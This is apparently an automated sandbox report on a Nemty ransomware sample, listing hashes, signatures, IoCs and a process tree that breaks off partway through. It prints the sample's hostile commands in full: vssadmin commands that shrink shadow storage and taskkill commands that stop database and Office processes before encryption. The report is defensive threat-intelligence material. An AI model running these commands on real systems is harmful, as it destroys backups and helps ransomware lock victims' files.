Analysis
-
max time kernel
78s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
26-07-2021 12:41
Static task
static1
Behavioral task
behavioral1
Sample
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
Resource
win10v20210410
General
-
Target
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
-
Size
207KB
-
MD5
ae24eb430be3d0598b7510bba484f580
-
SHA1
9b6a75b930e8ea41578ec0a6d3df2259a6990d1d
-
SHA256
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07
-
SHA512
ca5ec7ca780642bc0105a84c7f4eea60b826d36429ecdceb2a9bb27f2ce688909a6953d18bd9884b19a36604a8c170876c6997c743ca3dbe44ecdfd4a142042a
Malware Config
Signatures
-
Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
-
suricata: ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M1
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompleteSubmit.raw => C:\Users\Admin\Pictures\CompleteSubmit.raw.NEMTY_O85YRFZ a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\DebugUse.crw => C:\Users\Admin\Pictures\DebugUse.crw.NEMTY_O85YRFZ a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\MeasureUpdate.tif => C:\Users\Admin\Pictures\MeasureUpdate.tif.NEMTY_O85YRFZ a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File opened for modification C:\Users\Admin\Pictures\StepGet.tiff a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe File renamed C:\Users\Admin\Pictures\StepGet.tiff => C:\Users\Admin\Pictures\StepGet.tiff.NEMTY_O85YRFZ a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 api.db-ip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exepid process 3692 vssadmin.exe 1208 vssadmin.exe 5372 vssadmin.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4780 taskkill.exe 4916 taskkill.exe 4992 taskkill.exe 4304 taskkill.exe 4824 taskkill.exe 5072 taskkill.exe 4792 taskkill.exe 4828 taskkill.exe 5000 taskkill.exe 5092 taskkill.exe 5144 taskkill.exe 4696 taskkill.exe 4384 taskkill.exe 4884 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings cmd.exe -
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exepid process 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe -
Suspicious use of AdjustPrivilegeToken 59 IoCs
Processes:
vssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exedescription pid process Token: SeBackupPrivilege 4016 vssvc.exe Token: SeRestorePrivilege 4016 vssvc.exe Token: SeAuditPrivilege 4016 vssvc.exe Token: SeDebugPrivilege 4696 taskkill.exe Token: SeDebugPrivilege 4780 taskkill.exe Token: SeDebugPrivilege 4792 taskkill.exe Token: SeDebugPrivilege 4828 taskkill.exe Token: SeDebugPrivilege 4992 taskkill.exe Token: SeDebugPrivilege 4916 taskkill.exe Token: SeDebugPrivilege 5000 taskkill.exe Token: SeDebugPrivilege 4384 taskkill.exe Token: SeDebugPrivilege 5092 taskkill.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 4304 taskkill.exe Token: SeDebugPrivilege 4884 taskkill.exe Token: SeDebugPrivilege 5072 taskkill.exe Token: SeDebugPrivilege 5144 taskkill.exe Token: SeIncreaseQuotaPrivilege 5228 WMIC.exe Token: SeSecurityPrivilege 5228 WMIC.exe Token: SeTakeOwnershipPrivilege 5228 WMIC.exe Token: SeLoadDriverPrivilege 5228 WMIC.exe Token: SeSystemProfilePrivilege 5228 WMIC.exe Token: SeSystemtimePrivilege 5228 WMIC.exe Token: SeProfSingleProcessPrivilege 5228 WMIC.exe Token: SeIncBasePriorityPrivilege 5228 WMIC.exe Token: SeCreatePagefilePrivilege 5228 WMIC.exe Token: SeBackupPrivilege 5228 WMIC.exe Token: SeRestorePrivilege 5228 WMIC.exe Token: SeShutdownPrivilege 5228 WMIC.exe Token: SeDebugPrivilege 5228 WMIC.exe Token: SeSystemEnvironmentPrivilege 5228 WMIC.exe Token: SeRemoteShutdownPrivilege 5228 WMIC.exe Token: SeUndockPrivilege 5228 WMIC.exe Token: SeManageVolumePrivilege 5228 WMIC.exe Token: 33 5228 WMIC.exe Token: 34 5228 WMIC.exe Token: 35 5228 WMIC.exe Token: 36 5228 WMIC.exe Token: SeIncreaseQuotaPrivilege 5228 WMIC.exe Token: SeSecurityPrivilege 5228 WMIC.exe Token: SeTakeOwnershipPrivilege 5228 WMIC.exe Token: SeLoadDriverPrivilege 5228 WMIC.exe Token: SeSystemProfilePrivilege 5228 WMIC.exe Token: SeSystemtimePrivilege 5228 WMIC.exe Token: SeProfSingleProcessPrivilege 5228 WMIC.exe Token: SeIncBasePriorityPrivilege 5228 WMIC.exe Token: SeCreatePagefilePrivilege 5228 WMIC.exe Token: SeBackupPrivilege 5228 WMIC.exe Token: SeRestorePrivilege 5228 WMIC.exe Token: SeShutdownPrivilege 5228 WMIC.exe Token: SeDebugPrivilege 5228 WMIC.exe Token: SeSystemEnvironmentPrivilege 5228 WMIC.exe Token: SeRemoteShutdownPrivilege 5228 WMIC.exe Token: SeUndockPrivilege 5228 WMIC.exe Token: SeManageVolumePrivilege 5228 WMIC.exe Token: 33 5228 WMIC.exe Token: 34 5228 WMIC.exe Token: 35 5228 WMIC.exe Token: 36 5228 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.execmd.execmd.exedescription pid process target process PID 4084 wrote to memory of 2932 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2932 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2932 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2032 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2032 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2032 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 2932 wrote to memory of 3692 2932 cmd.exe vssadmin.exe PID 2932 wrote to memory of 3692 2932 cmd.exe vssadmin.exe PID 2932 wrote to memory of 3692 2932 cmd.exe vssadmin.exe PID 2032 wrote to memory of 1208 2032 cmd.exe vssadmin.exe PID 2032 wrote to memory of 1208 2032 cmd.exe vssadmin.exe PID 2032 wrote to memory of 1208 2032 cmd.exe vssadmin.exe PID 4084 wrote to memory of 1776 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1776 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1776 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1756 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1756 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1756 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2668 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2668 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2668 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2096 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2096 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2096 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4012 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4012 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4012 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1312 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1312 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1312 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2596 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2596 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2596 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1524 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1524 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1524 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 3872 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 3872 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 3872 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 3680 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 3680 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 3680 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2644 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2644 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 2644 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1828 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1828 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1828 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1336 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1336 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1336 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1872 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1872 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 1872 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4132 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4132 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4132 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4168 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4168 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4168 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4236 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4236 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4236 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe PID 4084 wrote to memory of 4276 4084 a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe"C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe"1⤵
- Modifies extensions of user files
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im thunderbird.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im outlook.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im wordpad.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im oracle.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.*2⤵
-
